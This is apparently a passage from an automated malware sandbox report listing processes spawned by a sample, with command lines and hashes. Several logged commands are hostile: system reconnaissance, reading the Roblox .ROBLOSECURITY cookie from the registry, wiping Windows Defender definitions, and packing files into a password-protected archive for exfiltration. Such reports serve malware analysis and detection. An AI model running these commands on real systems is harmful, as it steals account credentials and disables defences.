                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:43
                                                                                                                                                                                                                                            Start time:05:22:11
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\systeminfo.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:systeminfo
                                                                                                                                                                                                                                            Imagebase:0x7ff73b070000
                                                                                                                                                                                                                                            File size:110'080 bytes
                                                                                                                                                                                                                                            MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:45
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:46
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:47
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:48
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:49
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:50
                                                                                                                                                                                                                                            Start time:05:22:12
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:attrib -r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                            Imagebase:0x7ff71edc0000
                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:51
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:52
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:53
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:54
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:55
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:56
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:attrib +r C:\Windows\System32\drivers\etc\hosts
                                                                                                                                                                                                                                            Imagebase:0x7ff71edc0000
                                                                                                                                                                                                                                            File size:23'040 bytes
                                                                                                                                                                                                                                            MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:57
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:58
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\tgmup5d5\tgmup5d5.cmdline"
                                                                                                                                                                                                                                            Imagebase:0x7ff631db0000
                                                                                                                                                                                                                                            File size:2'759'232 bytes
                                                                                                                                                                                                                                            MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:59
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:60
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "getmac"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:61
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:62
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:63
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:64
                                                                                                                                                                                                                                            Start time:05:22:13
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:65
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                            Imagebase:0x7ff77aff0000
                                                                                                                                                                                                                                            File size:106'496 bytes
                                                                                                                                                                                                                                            MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:66
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\getmac.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:getmac
                                                                                                                                                                                                                                            Imagebase:0x7ff7eee90000
                                                                                                                                                                                                                                            File size:90'112 bytes
                                                                                                                                                                                                                                            MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:67
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:68
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:69
                                                                                                                                                                                                                                            Start time:05:22:14
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\tree.com
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:tree /A /F
                                                                                                                                                                                                                                            Imagebase:0x7ff73b8c0000
                                                                                                                                                                                                                                            File size:20'992 bytes
                                                                                                                                                                                                                                            MD5 hash:9EB969EF56718A6243BF60350CD065F0
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:70
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES93BE.tmp" "c:\Users\user\AppData\Local\Temp\tgmup5d5\CSC93ACBC84BC674220B3501D9F22ECFDE.TMP"
                                                                                                                                                                                                                                            Imagebase:0x7ff6ba320000
                                                                                                                                                                                                                                            File size:52'744 bytes
                                                                                                                                                                                                                                            MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:71
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:72
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:73
                                                                                                                                                                                                                                            Start time:05:22:17
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:75
                                                                                                                                                                                                                                            Start time:05:22:19
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:76
                                                                                                                                                                                                                                            Start time:05:22:19
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                            Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                            File size:862'208 bytes
                                                                                                                                                                                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:77
                                                                                                                                                                                                                                            Start time:05:22:20
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                                                                                                                                                                                            Imagebase:0x7ff788560000
                                                                                                                                                                                                                                            File size:452'608 bytes
                                                                                                                                                                                                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:80
                                                                                                                                                                                                                                            Start time:05:22:25
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                            Imagebase:0x7ff6d01f0000
                                                                                                                                                                                                                                            File size:468'120 bytes
                                                                                                                                                                                                                                            MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:81
                                                                                                                                                                                                                                            Start time:05:22:32
                                                                                                                                                                                                                                            Start date:17/11/2024
                                                                                                                                                                                                                                            Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                            Wow64 process (32bit):false
                                                                                                                                                                                                                                            Commandline:C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73082\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\MBLSI.zip" *"
                                                                                                                                                                                                                                            Imagebase:0x7ff7bb830000
                                                                                                                                                                                                                                            File size:289'792 bytes
                                                                                                                                                                                                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                            Has elevated privileges:true
                                                                                                                                                                                                                                            Has administrator privileges:true
                                                                                                                                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                                                                                                                                            Has exited:true

                                                                                                                                                                                                                                            General

                                                                                                                                                                                                                                            Target ID:82
                                                                                                                                                                                                                                            Start time:05:22:32
                                                                                                                                                                                                                                            Start date:17/11/2024
